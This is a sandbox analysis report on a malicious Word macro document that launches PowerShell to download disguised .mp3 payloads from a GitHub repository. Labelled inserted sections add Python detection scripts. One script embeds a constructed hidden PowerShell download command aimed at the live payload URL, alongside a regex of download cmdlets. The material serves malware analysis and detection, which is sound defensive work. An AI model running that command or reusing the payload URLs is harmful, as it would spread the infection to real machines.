Windows Analysis Report RfORrHIRNe.doc

Overview

General Information

Sample Name: RfORrHIRNe.doc
Analysis ID: 515215
MD5: 955d5d2855b291a3cf1fc6655bbbbb79
SHA1: b58901cf8967310228bc6e4c224b2cfaf014bc65
SHA256: 63acfd6633bf3fe6462d8de72904338e2a97392654d8b39a97d18b9e7f3b25b8

Detection

Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Found detection on Joe Sandbox Cloud Basic with higher score
Antivirus detection for dropped file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Suspicious powershell command line found
Machine Learning detection for sample
Powershell drops PE file
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Document has an unknown application name
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Document contains no OLE stream with summary information
Drops files with a non-matching file extension (content does not match file extension)
Sigma detected: PowerShell Download from URL
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Uses a known web browser user agent for HTTP communication
Document contains embedded VBA macros
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Potential document exploit detected (performs HTTP gets)

Classification

AV Detection:

Multi AV Scanner detection for submitted file
Source: RfORrHIRNe.doc Virustotal: Detection: 49%
Antivirus / Scanner detection for submitted sample
Source: RfORrHIRNe.doc Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\~DFF551811DB4F781F3.TMP Avira: detection malicious, Label: HEUR/Macro.Agent
Machine Learning detection for sample
Source: RfORrHIRNe.doc Joe Sandbox ML: detected

Compliance:

Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.7:49754 version: TLS 1.0
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.7:49755 version: TLS 1.0
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: github.com
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.7:49753 -> 140.82.121.3:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.7:49754 -> 140.82.121.3:443
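Added example, not part of the Joe Sandbox report. "Document exploit detected (process start blacklist hit)" is Joe Sandbox's generic label for a blacklisted process start; no memory-corruption exploit is reported, and the signatures above report an embedded VBA macro that runs when the document is opened or closed, which is the expected origin of WINWORD.EXE spawning powershell.exe here. A detection therefore rests on the process-tree relation plus the command line, which is exactly what the two Sigma hits (Microsoft Office Product Spawning Windows Shell; Windows Suspicious Use Of Web Request in CommandLine) check. The script below re-implements that logic over constructed Sysmon-style process-creation events: the image paths of the first event are those listed in the report, its command line is invented because the report does not show the real one, and the other two events are benign controls.

```python
"""Added example, not part of the Joe Sandbox report.

Re-implements, over constructed Sysmon-style process-creation events, the two
Sigma rules the report matched: an Office product spawning a Windows shell, and
a web request in a PowerShell command line. The image paths of the first event
are the ones listed in the report; its command line is invented, since the
report does not show the real one."""
import re
from dataclasses import dataclass

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SHELL_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Cmdlets, aliases and .NET members that fetch content from a URL; a bare URL
# in the command line counts as well.
WEB_REQUEST_RE = re.compile(
    r"invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|invoke-restmethod|\birm\b"
    r"|net\.webclient|downloadfile|downloadstring|start-bitstransfer|https?://",
    re.IGNORECASE,
)


@dataclass
class ProcessEvent:
    """Subset of a Sysmon event ID 1 (process creation)."""
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def office_spawns_shell(ev: ProcessEvent) -> bool:
    return basename(ev.parent_image) in OFFICE_PARENTS and basename(ev.image) in SHELL_CHILDREN


def web_request_in_cmdline(ev: ProcessEvent) -> bool:
    return basename(ev.image) in POWERSHELL and WEB_REQUEST_RE.search(ev.command_line) is not None


def triage(events):
    """Return (parent, child, [rule names]) for every event that hits at least one rule."""
    rules = (("office_spawns_shell", office_spawns_shell),
             ("web_request_in_cmdline", web_request_in_cmdline))
    findings = []
    for ev in events:
        hits = [name for name, rule in rules if rule(ev)]
        if hits:
            findings.append((basename(ev.parent_image), basename(ev.image), hits))
    return findings


SAMPLE_EVENTS = [  # constructed events
    ProcessEvent(
        r"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE",
        r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        # invented command line that reuses a URL the report observed
        'powershell -w hidden -c "Invoke-WebRequest http://github.com/ssbb36/stv/raw/main/5.mp3 -OutFile $env:TEMP\\5.mp3"',
    ),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell Get-ChildItem C:\\Users"),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE",
                 '"WINWORD.EXE" /n RfORrHIRNe.doc'),
]

if __name__ == "__main__":
    for parent, child, hits in triage(SAMPLE_EVENTS):
        print(f"{parent} -> {child}: {', '.join(hits)}")
```

Only the first event fires, on both rules; the interactive PowerShell session and Word being launched from Explorer stay quiet. The two rules are kept separate on purpose: the parent/child relation alone already warrants a look in an environment where Office should never start a shell, while the command-line rule also catches a PowerShell that was started some other way.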

Networking:

JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /ssbb36/stv/raw/main/5.mp3 HTTP/1.1 | Host: github.com | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ssbb36/stv/main/5.mp3 HTTP/1.1 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ssbb36/stv/raw/main/5.mp3 HTTP/1.1 | Host: github.com | Connection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.199.108.133
Source: Joe Sandbox View IP Address: 140.82.121.3
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.7:49754 version: TLS 1.0
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.7:49755 version: TLS 1.0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /ssbb36/stv/raw/main/2.mp3 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 | Host: github.com
Source: global traffic HTTP traffic detected: GET /ssbb36/stv/main/2.mp3 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 | Host: raw.githubusercontent.com
Source: global traffic HTTP traffic detected: GET /ssbb36/stv/raw/main/2.mp3 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 | Host: github.com
Source: global traffic HTTP traffic detected: GET /ssbb36/stv/raw/main/3.mp3 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 | Host: github.com
Source: global traffic HTTP traffic detected: GET /ssbb36/stv/raw/main/4.mp3 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 | Host: github.com
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49778
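Added example, not part of the Joe Sandbox report. The GET requests above come from two PowerShell download paths: requests with no User-Agent and only Host and Connection: Keep-Alive headers are consistent with System.Net.WebClient, and Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 is the default User-Agent of Invoke-WebRequest, so the "known web browser user agent" signature is in practice a PowerShell indicator. The only hosts named in the traffic entries are github.com and raw.githubusercontent.com; the long run of *.office.com, onenote.com and similar URLs that follows under 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr is the contents of a dropped file listing Microsoft Office's own service endpoints and is not attacker infrastructure. The script below triages the download transactions with three checks (missing User-Agent, PowerShell default User-Agent, response bytes that do not match the .mp3 extension in the URL, which is the same idea as the report's "Drops files with a non-matching file extension" signature). The URLs and request headers are the ones listed above; the response bodies and the example.com contrast entry are constructed.

```python
"""Added example, not part of the Joe Sandbox report.

Triage of the download traffic listed above, over constructed HTTP transactions
that reuse the report's URLs and request headers; the response bodies are
invented, since the report does not show what the .mp3 URLs returned. Flags
requests without a User-Agent, the default Invoke-WebRequest User-Agent, and
responses whose leading bytes do not match the file extension in the URL."""
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# Default User-Agent of Invoke-WebRequest / Invoke-RestMethod on Windows PowerShell 5.x
PS_DEFAULT_UA = re.compile(r"WindowsPowerShell/\d", re.IGNORECASE)

# (leading bytes, type) pairs; first match wins.
MAGIC = [
    (b"MZ", "pe"),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole-cfb"),  # legacy .doc/.xls container
    (b"PK\x03\x04", "zip"),                            # also .docx/.xlsx
    (b"%PDF", "pdf"),
    (b"ID3", "mp3"),                                   # MP3 with an ID3v2 tag
    (b"\xff\xfb", "mp3"), (b"\xff\xf3", "mp3"), (b"\xff\xf2", "mp3"),  # bare MPEG layer III frame sync
]
# Types legitimately found behind a given extension.
EXT_TYPES = {"mp3": {"mp3"}, "doc": {"ole-cfb"}, "docx": {"zip"}, "pdf": {"pdf"},
             "exe": {"pe"}, "dll": {"pe"}}


def sniff(body: bytes) -> str:
    """Classify a response body by its leading bytes."""
    for magic, kind in MAGIC:
        if body.startswith(magic):
            return kind
    head = body[:64]
    if head and all(32 <= b < 127 or b in b"\r\n\t" for b in head):
        return "text"  # printable: a script or HTML, not media
    return "unknown"


@dataclass
class HttpTransaction:
    url: str
    headers: dict        # request headers
    body_head: bytes     # first bytes of the response


def url_extension(url: str) -> str:
    name = urlsplit(url).path.rsplit("/", 1)[-1]
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def triage(tx: HttpTransaction) -> list:
    findings = []
    ua = next((v for k, v in tx.headers.items() if k.lower() == "user-agent"), None)
    if ua is None:
        findings.append("no-user-agent")
    elif PS_DEFAULT_UA.search(ua):
        findings.append("powershell-default-user-agent")
    ext, kind = url_extension(tx.url), sniff(tx.body_head)
    if ext in EXT_TYPES and kind not in EXT_TYPES[ext]:
        findings.append(f"content-mismatch:{ext}->{kind}")
    return findings


def triage_all(transactions) -> dict:
    return {tx.url: triage(tx) for tx in transactions}


SAMPLE = [  # constructed: URLs and headers as in the report, bodies invented
    HttpTransaction("http://github.com/ssbb36/stv/raw/main/5.mp3",
                    {"Host": "github.com", "Connection": "Keep-Alive"},
                    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff"),
    HttpTransaction("https://raw.githubusercontent.com/ssbb36/stv/main/2.mp3",
                    {"User-Agent": "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1",
                     "Host": "raw.githubusercontent.com"},
                    b"$b = [Convert]::FromBase64String('TVqQAAMAAAAEAAAA')\r\n"),
    # hypothetical benign download for contrast (example.com is a placeholder)
    HttpTransaction("https://example.com/song.mp3",
                    {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:94.0) Gecko/20100101 Firefox/94.0",
                     "Host": "example.com"},
                    b"ID3\x04\x00\x00\x00\x00\x00\x00"),
]

if __name__ == "__main__":
    for url, findings in triage_all(SAMPLE).items():
        print(url, "->", ", ".join(findings) or "clean")
```

The first transaction is flagged for the missing User-Agent and for an MZ header behind a .mp3 name, the second for the PowerShell User-Agent and a printable (script) body, and the benign control passes. Sniffing the first bytes is cheap enough to run inline on a proxy or in a sandbox post-processor, and a media extension over a code-hosting domain is a pattern worth alerting on by itself even before the body arrives.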
Source: powershell.exe, 00000003.00000003.341694746.0000000008910000.00000004.00000001.sdmp String found in binary or memory: http://crl.microsof
Source: powershell.exe, 00000003.00000002.556594505.0000000005261000.00000004.00000001.sdmp String found in binary or memory: http://github.com
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp String found in binary or memory: http://github.com/ssbb36/stv/raw/main/2.mp3
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp String found in binary or memory: http://github.com/ssbb36/stv/raw/main/3.mp3
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp String found in binary or memory: http://github.com/ssbb36/stv/raw/main/4.mp3
Source: PowerShell_transcript.141700.Lg6KA_8X.20211104015721.txt.3.dr String found in binary or memory: http://github.com/ssbb36/stv/raw/main/5.mp3
Source: powershell.exe, 00000003.00000002.557346076.00000000056A8000.00000004.00000001.sdmp String found in binary or memory: http://go.micros
Source: powershell.exe, 00000003.00000002.558226568.0000000006182000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: powershell.exe, 00000003.00000002.556594505.0000000005261000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000003.00000002.556042753.0000000005121000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: powershell.exe, 00000003.00000002.556594505.0000000005261000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://api.aadrm.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://api.aadrm.com/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://api.cortana.ai
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://api.diagnostics.office.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://api.microsoftstream.com/api/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://api.office.net
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://api.onedrive.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://apis.live.net/v5.0/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://augloop.office.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://augloop.office.com/v2
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://cdn.entity.
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://clients.config.office.net/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://config.edge.skype.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: powershell.exe, 00000003.00000002.558226568.0000000006182000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.558226568.0000000006182000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.558226568.0000000006182000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://cortana.ai
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://cortana.ai/api
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://cr.office.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://dataservice.o365filtering.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://dataservice.o365filtering.com/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://dev.cortana.ai
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://devnull.onenote.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://directory.services.
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://enrichment.osi.office.net/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: powershell.exe, 00000003.00000002.556594505.0000000005261000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp String found in binary or memory: https://github.com/ssbb36/stv/raw/main/1.mp3
Source: powershell.exe, 00000003.00000002.556715465.0000000005363000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp String found in binary or memory: https://github.com/ssbb36/stv/raw/main/4.mp3
Source: powershell.exe, 00000003.00000002.556696783.000000000535C000.00000004.00000001.sdmp String found in binary or memory: https://github.com/ssbb36/stv/raw/main/5.mp3
Source: powershell.exe, 00000003.00000002.556696783.000000000535C000.00000004.00000001.sdmp String found in binary or memory: https://github.com4
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: powershell.exe, 00000003.00000002.557922346.0000000005917000.00000004.00000001.sdmp String found in binary or memory: https://go.micro
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://graph.ppe.windows.net
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://graph.ppe.windows.net/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://graph.windows.net
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://graph.windows.net/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
